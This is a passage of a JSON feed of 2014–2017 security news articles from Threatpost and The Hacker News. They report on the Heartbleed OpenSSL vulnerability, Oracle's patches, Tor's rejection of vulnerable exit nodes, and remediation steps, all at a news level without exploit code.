vulnerability](<http://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>), as well as their current status with respect to vulnerable versions of the encryption library.\n\nAmong the patches that should be prioritized are two bugs in Oracle\u2019s database products. The more severe of these two issues could lead to a full compromise of impacted Windows systems, though exploitation would require that an attacker authenticate him or herself. Other platforms like Linux and Solaris are less affected because the database does not extend into the underlying operating system there.\n\nThe update also closes off 20 Fusion middleware vulnerabilities, the most critical of which is remotely exploitable without authentication and could lead to a wide compromise of the WebLogic Server.\n\nAlso included in its April release are 37 Java vulnerabilities. Four of those received the highest possible CVSS ratings of 10.0. Oracle urges all user \u2013 home users in particular \u2013 to apply these patches immediately.\n\nThe patch update also fixes five vulnerabilities affecting Oracle Linux and Virtualization products. The most severe of these vulnerabilities could affect certain versions of Oracle Global Secure Desktop.\n\n\u201cDue to the relative severity of a number of the vulnerabilities fixed in this Critical Patch Update, Oracle strongly recommends that customers apply this Critical Patch Update as soon as possible,\u201d wrote Oracle security assurance manager, Eric Maurice.\n\nEarlier this month, [researchers from Security Explorations disclosed more than two dozen outstanding issues with the company\u2019s Java Cloud Service platform](<http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs/105190>). There is no mention of that line of products in the update, so it appears that the company did not resolve those bugs. At the beginning or March, researchers at the London-based computer security firm Portcullis claimed to uncover[ four bugs in the Oracle\u2019s Demantra Value Chain Planning suite of software](<http://threatpost.com/four-vulnerabilities-found-in-oracle-demantra/104574>). The update makes no mention of these vulnerabilities either.\n", "reporter": "Brian Donohue", "published": "2014-04-16T12:32:06", "type": "threatpost", "title": "April 2014 Oracle Critical Patch Update", "enchantments": {"score": {"modified": "2018-10-06T22:59:00", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2014-04-21T14:36:06", "id": "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "href": "https://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:58:58", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160", "http://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494", "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html"], "description": "As the dominoes continue to fall around Heartbleed, Oracle is doing its best to keep users apprised of its ongoing efforts to patch software that may be vulnerable to the OpenSSL vulnerability.\n\nIn a document [updated early this morning](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) Oracle gave its customers five separate updates regarding:\n\n * Products that were never vulnerable to Heartbleed\n * Products still under investigation that may be vulnerable to Heartbleed\n * Products that are \u201clikely\u201d vulnerable to Heartbleed that have fixes\n * Products that are \u201clikely\u201d vulnerable to Heartbleed that have no current fixes\n * Products that do not use OpenSSL and\n * An update regarding Oracle Cloud\n\nMost of the updates given by Oracle refer to Heartbleed not by its buzzy nickname but by its official Common Vulnerabilities and Exposures number, [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>).\n\nMore than 100 products \u2013 managers, gateways, switches and systems, etc. \u2013 were ruled safe by the company, mostly because they don\u2019t run a version of OpenSSL that was ruled vulnerable to the CVE-2014-0160 instability.\n\nElsewhere developers at the company are reportedly still looking into whether or not 10 different products, notably those that use the company\u2019s Art Technology Group and Corente technology, are vulnerable to Heartbleed. Information for those products is still forthcoming.\n\nFourteen products, mostly those that rely on MySQL, Oracle\u2019s Big Data Appliance and its Mobile Security Suite have been patched so far. The company is posting as soon as each product is remedied and then linking to their respective support sections.\n\nConversely, 11 products, including some builds of Java ME and five iterations of its Communications suite, are branded as \u201clikely\u201d vulnerable but no fixes are yet available.\n\nLastly, the company claims its still unsure of how Heartbleed affects products that rely on its Cloud computing technology but that it\u2019s \u201cinvestigating the implications of this issue across the Oracle stack.\u201d The bulk of cloud service products, including its Public Cloud, Managed Cloud Services and Cloud for Industry, are free of vulnerabilities but other services have been deemed \u201cunder investigation.\u201d\n\nOracle points out that the document should be considered as fluid and will continue to be updated as fixes and further mitigation instructions become available. Until then the patch and vulnerability information should be taken on an \u201cAS-IS\u201d basis.\n\nEnd users who deploy a variety of Oracle products on their networks have no doubt had their hands full with patches as of late. The Heartbleed update comes [just a few days after](<http://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494>) the company\u2019s regularly scheduled quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). That update resolved more than 100 security issues across Java SE, along with the company\u2019s Database and Fusion Middleware.\n", "reporter": "Chris Brook", "published": "2014-04-21T13:55:42", "type": "threatpost", "title": "Oracle Gives Heartbleed Update, Patches 14 Products", "enchantments": {"score": {"modified": "2018-10-06T22:58:58", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2014-04-21T17:55:42", "id": "THREATPOST:9012A325F248438FAC15C4FB3082A796", "href": "https://threatpost.com/oracle-gives-heartbleed-update-patches-14-products/105576/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:58:59", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489", "http://www.mulliner.org/blog/blosxom.cgi/security/torbleed.html", "https://lists.torproject.org/pipermail/tor-relays/2014-April/004336.html", "https://threatpost.com/seriousness-of-openssl-heartbleed-bug-sets-in/105309", "http://threatpost.com/stealing-private-ssl-keys-using-heartbleed-difficult-not-impossible/105413", "https://blog.torproject.org/blog/openssl-bug-cve-2014-0160"], "description": "The Tor Project has begun blacklisting exit nodes vulnerable to the [Heartbleed vulnerability in OpenSSL](<https://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>).\n\nResearcher Collin Mulliner, with the Systems Security Lab at Northeastern University in Boston, published the results of an experiment he conducted using a publicly disclosed Heartbleed proof-of-concept exploit against 5,000 Tor nodes. Mulliner said that [1,045 nodes, or a little more than 20 percent, were vulnerable to the bug](<http://www.mulliner.org/blog/blosxom.cgi/security/torbleed.html>).\n\nMulliner said only Tor exit nodes were leaking plaintext user traffic, including host names, credentials and web content. Mulliner conducted his experiment for three days last Friday through Sunday, and his results are a point-in-time snapshot. A post yesterday from Tor Project leader Roger Dingledine on the Tor mailing list said that [380 vulnerable exit keys were being rejected](<https://lists.torproject.org/pipermail/tor-relays/2014-April/004336.html>).\n\nHeartbleed was publicly reported on April 7. The vulnerability lies in the heartbeat function in OpenSSL 1.0.1 to 1.0.1f [which publicly leaks 64 KB of memory](<https://threatpost.com/seriousness-of-openssl-heartbleed-bug-sets-in/105309>) to any client or server pinging a web server running the vulnerable crypto library. The memory leaks can disclose in plaintext anything from user credentials to private server keys if the attack is repeated enough. Several researchers have already managed to [retrieve private SSL keys](<http://threatpost.com/stealing-private-ssl-keys-using-heartbleed-difficult-not-impossible/105413>) in an online challenge from vendor CloudFlare. Speculation is that intelligence agencies and/or hackers may have been exploiting it since November. Mulliner said he did not try to extract private keys from Tor, nor did he think it was possible.\n\nTor promises anonymity to its users by using proxies to pass encrypted traffic from source to destination. Mulliner said he used a random list of 5,000 Tor nodes from the Dan.me.uk website for his research; of the 1,045 vulnerable nodes he discovered, he recovered plaintext traffic that included Tor plaintext announcements, but a significant number of nodes leaked user traffic in the clear.\u201d\n\n\u201cI found a significant amount of plaintext user traffic, complete Web traffic, session IDs; everything you would find if you ran Heartbleed against a normal Web server,\u201d Mulliner said.\n\nHeartbleed saves attackers the work of setting up their own exit node and waiting for traffic to pass through it. Using Heartbleed, all a hacker would have to do is query a vulnerable exit node to obtain traffic, Mulliner said.\n\nDingledine yesterday published the first list of rejected exit nodes and said those nodes will not be allowed back on the network.\n\n\u201cI thought for a while about trying to keep my list of fingerprints up-to-date (i.e. removing the !reject line once they\u2019ve upgraded their openssl), but on the other hand, if they were still vulnerable as of yesterday, I really don\u2019t want this identity key on the Tor network even after they\u2019ve upgraded their OpenSSL,\u201d Dingledine wrote. He added that he hopes others will add to this list as other vulnerable relays are discovered.\n\nTor acknowledged [some of its components were vulnerable to Heartbleed](<https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>) in a post to its blog on April 7.\n\nMulliner said it was a fairly straightforward process to write a script to run a Heartbleed proof of concept.\n\n\u201cAnybody who can get the Python script can play around with it,\u201d Mulliner said, adding that there are likely fewer vulnerable Tor nodes now than when he ran his scans last week since some have likely been patched and Tor has begun blacklisting. \u201cThe data is dated, but it\u2019s a good picture of that point in time.\u201d\n", "reporter": "Michael Mimoso", "published": "2014-04-17T11:40:41", "type": "threatpost", "title": "Tor Blacklisting Exit Nodes Vulnerable to Heartbleed Bug", "enchantments": {"score": {"modified": "2018-10-06T22:58:59", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2014-04-22T15:45:23", "id": "THREATPOST:15624C23F5CD5AC1029501D08A99D294", "href": "https://threatpost.com/tor-begins-blacklisting-exit-nodes-vulnerable-to-heartbleed/105519/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:11", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://1.bp.blogspot.com/-YQ3pfHXH8Vc/U0kTASBjW0I/AAAAAAAAbLs/0VNzJlaw61E/s1600/NSA-Heartbleed-vulnerability.jpg>)\n\nThe Bloomberg [claimed](<http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html>) that the U.S. National Security Agency (NSA) knew about the most critical Heartbleed flaw and has been using it on a regular basis to gather \u201c_critical intelligence_\u201d and sensitive information for at least past two years and decided to keep the bug secret, citing two sources \u2018_familiar with the matter_\u2019.\n\n \n\n\nIn response to the above report, NSA has issued a '_94 character'_ statement today denying the claims that it has known about the Heartbleed bug since two years and that it has been using it silently for the purpose of surveillance.\n\n \n\n\n\"_NSA was not aware of the recently identified Heartbleed vulnerability until it was made public_,\" the U.S. intelligence agency said on its [Twitter feed](<https://twitter.com/NSA_PAO/status/454720059156754434>).\n\n \n\n\n[Heartbleed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) is one of the biggest Internet vulnerabilities in recent history that left large number of cryptographic keys and private data such as usernames, passwords, and credit card numbers, from the most important sites and services on the Internet open for hackers. \n\n \n\n\nThe bug resides in the \"_Heartbeat_\" feature of the most secured open source encryption protocol, OpenSSL, which is used by several social networks, search engines, banks and other websites to enable secure connections while transmitting data.\n\n \n\n\nA team of researchers from Codenomicon and Google Security researcher revealed the vulnerability this week that is in the wild since the new version 1.0.1f was released in March 2012. And just after the revelation, OpenSSL released the security Fix for the bug in its version 1.0.1g, but until then the Heartbleed bug made websites, email, instant messaging (IM), including some virtual private networks, on about half a million of the world's widely trusted web servers, open to hackers.\n\n \n\n\nThe birth of the most critical bug Heartbleed was due to a mistake done by a German programmer [Robin Seggelmann](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) over two years ago while working on a new Heartbeat feature in the OpenSSL.\n\n \n\n\nHe submitted the code of OpenSSL with the heartbeat feature in an update on New Year's Eve, 2011, and an \u201c_oversight_\u201d led to an error that unintentionally created the \u201c**Heartbleed**\u201d vulnerability.\n\n \n\n\nYesterday he said it could be entirely possible that the government intelligence agencies had been making use of this critical flaw over the past two years.\n\n \n\n\nThe fix was released just after, but the users\u2019 data are vulnerable until the vulnerable websites didn\u2019t implement it. You can only change your password immediately for those websites that are not affected, assuming that it was vulnerable before, just to make sure that you are now safe.\n\n \n\n\n**Related Important Articles:**\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "reporter": "Swati Khandelwal", "published": "2014-04-11T23:21:00", "type": "thn", "title": "NSA denies Report that Agency knew and exploited Heartbleed Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2014-04-12T10:21:51", "id": "THN:EBCB003D7DB7BD8BF73239F9718C6126", "href": "https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://3.bp.blogspot.com/-PsXPunZKgEw/U0bcA1AOL-I/AAAAAAAAAL0/PLT1hx4fDZw/s1600/Heartbleed-bug-Exposes-Passwords.png>)\n\nAre you safe from the critical bug Heartbleed?? OpenSSL- the encryption technology used by millions of websites to encrypt the communication and is also used to protect our sensitive data such as e-mails, passwords or banking information. \n\n \n\n\nBut a tiny, but most critical flaw called \"[_Heartbleed_](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\" in the widely used OpenSSL opened doors for the cyber criminals to extract sensitive data from the system memory.\n\n** \n**\n\n**WHAT IS HEARTBLEED?**\n\nSSL and TLS are known to provide communication security and privacy over the Internet for applications such as websites, email, instant messaging (IM), including some virtual private networks (VPNs).\n\n \n\n\nHeartbleed is a critical bug (**[CVE-2014-0160](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)**) is in the popular OpenSSL cryptographic software library, that actually resides in the OpenSSL's implementation of the TLS (transport layer security protocols) and DTLS (_Datagram TLS_) heartbeat extension (RFC6520).\n\n \n\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at _Codenomicon_, while improving the SafeGuard feature in Codenomicon's Defensics security testing tools, and Neel Mehta of Google Security, who first reported it to the OpenSSL team.\n\n \n\n\nSoftware vulnerabilities may come and go, but this bug is more critical as it has left the large number of private keys and other secrets exposed to the Internet. The heartbleed bug can reveal the contents of a server's memory, where the most sensitive data is stored, including the private data such as usernames, passwords, and credit card numbers. \n\n \n\n\nThis could allow attackers to retrieve private keys and ultimately decrypt the server's encrypted traffic or even impersonate the server.\n\n> \u201c_The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users_.\u201d\n\n**HEARTBLEED WORLDWIDE ****IMPACT**\n\nOpenSSL is most widely used cryptographic library for Apache and nginx Web servers, which handles a service of Transport Layer Security (TLS) called **Heartbeat**, an extension added to TLS in 2012. The combined market share of just those two, Apache and nginx, out of the active sites on the Internet is over 66% according to Netcraft's April 2014 Web Server Survey.\n\n \n\n\nMoreover, OpenSSL is used to protect email servers (SMTP, POP and IMAP protocols), chat servers (XMPP protocol), virtual private networks (SSL VPNs), network appliances and wide variety of client side software. Many large consumer sites are also saved by their conservative choice of SSL/TLS termination equipment and software. OpenSSL is also very popular in client software and somewhat popular in networked appliances which have most inertia in getting updates. \n \nSecurity researcher _'Robert Graham_' [scanned the Internet](<http://blog.erratasec.com/2014/04/600000-servers-vulnerable-to-heartbleed.html#.U0bKFfnlbGw>) and found that more than 600,000 servers are vulnerable to heartbleed flaw, including Yahoo.com, imgur.com, flickr.com, hidemyass.com. [[List](<https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt>)]\n\n \n\n\nBecause of Heartbleed bug, the Canada Revenue Agency was forced to shut down its electronic tax collection service yesterday and apparently, World's biggest audio platform SoundCloud also logged out its users for fixing this flaw.\n\n[](<https://4.bp.blogspot.com/-ZjFqjwDfyfs/U0bGT6lMcEI/AAAAAAAAbIc/HdTKJsQUB3U/s1600/soundcloud.png>)\n\nYahoo, which has more than 800 million users around the world, also has been [exposed](<https://twitter.com/markloman/status/453502888447586304/photo/1>) by the bug. \n\n\n[](<https://1.bp.blogspot.com/-C1vFJyYZ5Ig/U0bIgPoTloI/AAAAAAAAbIo/EjLY1KOHb9w/s1600/yahoo-password-cracking.png>)\n\n** \n** **HOW HEARTBLEED WORKS?**\n\nIt is not a problem with the TLS/SSL technologies that encrypt the Internet, neither with how OpenSSL works. It is just a dumb coding mistake. \n \nUsing Heartbeats extension two computers make sure the other is still alive by sending data back and forth to each other. The client (user) sends its heartbeat to the server (website), and the server hands it right back. If by chance anyone of them goes down during the transaction, the other one will know using heartbeat sync mechanism. \n \nWhen that heartbeat is sent, a small amount of the server\u2019s short-term memory of about 64 kilobytes comes in reply from server and an attacker is supposed to grab it, that can leak sensitive data such as message contents, user credentials, session keys and server private keys. By sending heartbleed requests multiple times, an attacker is able to fetch more memory contents from the server.\n\n \n\n\nThis means, everything and anything in the memory such as SSL private keys, user keys used for your usernames and passwords, instant messages, emails and business critical documents and communication, and many more is vulnerable to cyber criminals. At this phase, you have to assume that it is all compromised. \n \nAbout two-thirds of web servers rely on OpenSSL, means the information passing through hundreds of thousands of websites could be vulnerable. \n \nSo far, Security experts have found no direct evidence that anyone has managed to use the bug to steal information. The vulnerability has been fixed in OpenSSL v1.0.1g. \n \nMajor websites, including Gmail and YouTube, Facebook, Tumblr, Yahoo and Dropbox have fixed the problem, but there are still thousands of websites who are yet to fix the problem. Users are advised to change their passwords on only those affected websites, that tell you they've fixed the problem. **[READ MORE](<https://thehackernews.com/2014/04/how-to-protect-yourself-from-heartbleed_10.html>) on how to protect yourself from Heartbleed bug**. \n \n**Related Important Articles:** \n \n \n \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "reporter": "Swati Khandelwal", "published": "2014-04-10T07:00:00", "type": "thn", "title": "How Heartbleed Bug Exposes Your Passwords to Hackers", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2014-04-12T09:00:54", "id": "THN:8D999AEE5218AD3BFA68E5ACE101F201", "href": "https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:03", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://3.bp.blogspot.com/-eqXY6SQWOkQ/WIXZQiMLlTI/AAAAAAAArJA/-0BiAp9seZgDvkXXXuhbrQYOG1h5FpVtACLcB/s1600/heartbleed-openssl-vulnerability.png>)\n\nIt's more than two and half years since the discovery of the critical [OpenSSL Heartbleed vulnerability](<https://thehackernews.com/2014/04/hacker-exploits-heartbleed-bug-to.html>), but the flaw is still alive as it appears that many organizations did not remediate properly to the serious security glitch. \n \nIt was one of the biggest flaws in the Internet's history that affected the core security of as many as two-thirds of the world's servers i.e. half a million servers at the time of its discovery in April 2014. \n \nHowever, the critical bug still affects more than 199,500 systems even after 2 years and 9 months have already passed, according to a [new report](<https://www.shodan.io/report/DCPO7BkV?utm_campaign=news-alert&utm_medium=email&utm_source=app>) published today on Shodan, a search engine that scans for vulnerable devices. \n \n\n\n### Over 199,500 Systems Still Vulnerable to Heartbleed\n\n \n[Heartbleed](<https://thehackernews.com/2014/04/several-tor-exit-nodes-vulnerable-to.html>) (CVE-2014-0160) was a serious bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allowed [attackers to read portions](<https://thehackernews.com/2014/04/19-year-old-teenager-arrested-for_16.html>) of the affected server\u2019s memory, potentially revealing users data that the server isn't intended to reveal. \n \nAccording to Shodan CEO John Matherly, about 199,500 services remain exploitable by the Heartbleed vulnerability due to unpatched OpenSSL instances. \n \nThe countries most affected by Heartbleed still remain the United States, followed by Korea, China, Germany, France, Russian Federation, United Kingdom, India Brazil and Italy. \n \nMatherly discovered 42,032 heartbleed-exploitable services in the United States, 15,380 in Korea, 14,116 in China, and 14,072 services in Germany. \n \nWith top organizations vulnerable to the OpenSSL bug is SK Broadband and Amazon.com, and about 75,000 of the vulnerable services use expired SSL certificates and run Linux 3.x. \n \n[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>) is one of many flaws that often exist unpatched in the wild, and now that the bug has been more than two and half years old and known to everybody, anyone can simply use it to carry out attacks against the still affected systems. \n \nAround 200,000 is really a troubling number, and one can imagine the danger and damages caused by the bug if exploited. \n \nSoftware bugs may come and go, but this flaw is more critical and probably the biggest Internet flaw in recent history as it left the contents of a server's memory, where the most sensitive data is stored, exposed to the attackers. \n \n\n\n### What are the Steps to Protect your Systems against Heartbleed?\n\n \nIt takes roughly three steps to remediate the Heartbleed bug. \n \n\n\n 1. **Patching**: Update your software to the latest versions of OpenSSL; thankfully almost all organization have accomplished this step.\n 2. **Creation of New Private Keys**: Creating new private keys will prevent an attacker, who already exploited the flaw before patching, from being able to spy on your encrypted.\n 3. **Reissuance of Security Certificates**: This step will eliminate the ability of any attacker to spoof organizations and fool or phish their customers.\n", "reporter": "Swati Khandelwal", "published": "2017-01-22T23:27:00", "type": "thn", "title": "Over 199,500 Websites Are Still Vulnerable to Heartbleed OpenSSL Bug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2017-01-23T10:35:46", "id": "THN:847F48AE6816E6BFF25355FC0EA7439A", "href": "https://thehackernews.com/2017/01/heartbleed-openssl-vulnerability.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://1.bp.blogspot.com/-3SCoP4FOfiE/U0RKMR7pksI/AAAAAAAAbHo/1YEQztc6eEw/s1600/OpenSSL-Heartbleed-vulnerability-CVE-2014-0160.png>)\n\nIt is advised to those who are running their web server with OpenSSL 1.0.1 through 1.0, then it is significantly important that you update to OpenSSL 1.0.1g immediately or as soon as possible. \n\n \n\n\nAs this afternoon, an extremely critical programming flaw in the OpenSSL has been discovered that apparently exposed the cryptographic keys and private data from some of the most important sites and services on the Internet.\n\n \n\n\nThe bug was independently discovered by security firm _[Codenomicon](<http://www.codenomicon.com/>)_ along with a Google Security engineer. The flaw is in the popular OpenSSL cryptographic software library and its weakness allows cyber criminals to steal the information protected, under normal conditions, by the SSL (Secure Sockets Layer) or TLS (Transport Security Layer) [encryption](<https://thehackernews.com/search/label/encryption>) used to secure the Internet.\n\n \n\n\nOpenSSL is an open-source implementation of the SSL and TLS protocols. The core library implements the basic cryptographic functions that enable SSL and TLS encryption. Mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n \n\n\n**HEARTBLEED BUG**\n\nThe discoverer of the vulnerability dubbed the bug as \u2018_[Heartbleed bug](<http://heartbleed.com/>)_\u2019, as the exploit rests on a bug in the implementation of OpenSSL\u2019s TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520).\n\n \n\n\nThis critical bug with code ID_ CVE-2014-0160_, could allows an attacker to expose up to 64kB of memory from the server or a connected client computer running a vulnerable version of OpenSSL software. Specifically, this means that an attacker can steal keys, passwords and other private information remotely.\n\n \n\n\n\u201c_We have tested some of our own services from attacker\u2019s perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, usernames and passwords, instant messages, emails and business critical documents and communication_.\u201d\n\n \n\n\nThe [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) in the OpenSSL\u2019s transport layer security (TSL) protocols\u2019 heartbeat section has been in the wild since March 2012 and is supposed to be even more dangerous than [Apple\u2019s recent SSL bug](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>), which outcropped the possibility for man-in-the-middle (MitM) attacks.\n\n \n\n\nAs the Heartbleed bug reveals encryption keys that could lead to other compromises, affects past traffic and may affect as much as 66 percent of Internet websites over the internet. 10 out of top 1000 sites are vulnerable to this flaw, including Yahoo Mail, Lastpass and the FBI site. There also is a proof-of-concept exploit for the flaw [posted on Github](<https://gist.github.com/takeshixx/10107280>). On this [website](<https://filippo.io/Heartbleed/>), you can check if your web server is vulnerable or not.\n\n \n\n\n\"_Bugs in single software or library come and go and are fixed by new versions,_\" the researchers who discovered the vulnerability wrote in a blog post published Monday. \"_However this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitations and attacks leaving no trace this exposure should be taken seriously._\"\n\n \n\n\nFixes for the bug have been released by the researchers. So, who are running the OpenSSL 1.0.1f version may update to [OpenSSL 1.0.1g](<https://www.openssl.org/>). The users running older version of OpenSSL are safe. \n \n**Related Important Articles:** \n \n \n \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "reporter": "Wang Wei", "published": "2014-04-08T08:23:00", "type": "thn", "title": "Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2014-04-12T09:01:01", "id": "THN:0F7112302CBABF46D19CACCCFA6103C5", "href": "https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:17:12", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://4.bp.blogspot.com/-Q0TNjq7Fcx8/U0riot0TcrI/AAAAAAAAbMs/99nvaMv2pwQ/s1600/Android-blackberry-apple-iphone-heartbleed.jpg>)\n\n[Heartbleed](<https://thehackernews.com/search/label/Heartbleed%20bug>) has left a worst impression worldwide affecting millions of websites and is also supposed to put millions of Smartphones and tablets users at a great risk.\n\n \n\n\nHeartbleed is a critical bug (_[CVE-2014-0160](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)_) in the popular OpenSSL cryptographic software library, that actually resides in the OpenSSL's implementation of the TLS/DTLS heartbeat extension, which allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data such as usernames, passwords, and credit card numbers, that the server did not intend to reveal.\n\n \n\n\n[OpenSSL](<https://thehackernews.com/search/label/OpenSSL>) is a widely-used cryptographic library which implements the SSL and TLS protocol and protects communications on the Internet, and mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n \n\n\nBut to assume that the users using desktop browsers to visit websites are vulnerable to the Heartbleed bug, will be wrong. Despite 40-60 billion active Smartphone applications may be sharing some of those same servers or connect to their own group of servers that may also be compromised.\n\n \n\n\n**ANDROID**\n\nGoogle wrote in an update on its Online Security [blog](<https://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html>) on Wednesday, emphasizing that Android was not vulnerable to the Heartbleed bug, except for a very specific version and can you guess that so called specific version??\n\n \n\n\n[Android](<https://thehackernews.com/search/label/Android>) 4.1.1 Jelly Bean, the one which makes up the majority of Android devices around the world, and which relies on the vulnerable version of OpenSSL.\n\n \n\n\nGoogle didn\u2019t reveal the actual figure that are vulnerable to the bug, but according to the latest [dashboard ](<https://developer.android.com/about/dashboards/index.html?utm_source=ausdroid.net>)released by Google, it is estimated that around 34.4% of the Android devices in use today are running the Android 4.1.x version. \n\n \n\n\nEven last September Google announced that it had activated one billion devices. This means that the minimal number is likely to be in the millions. So, 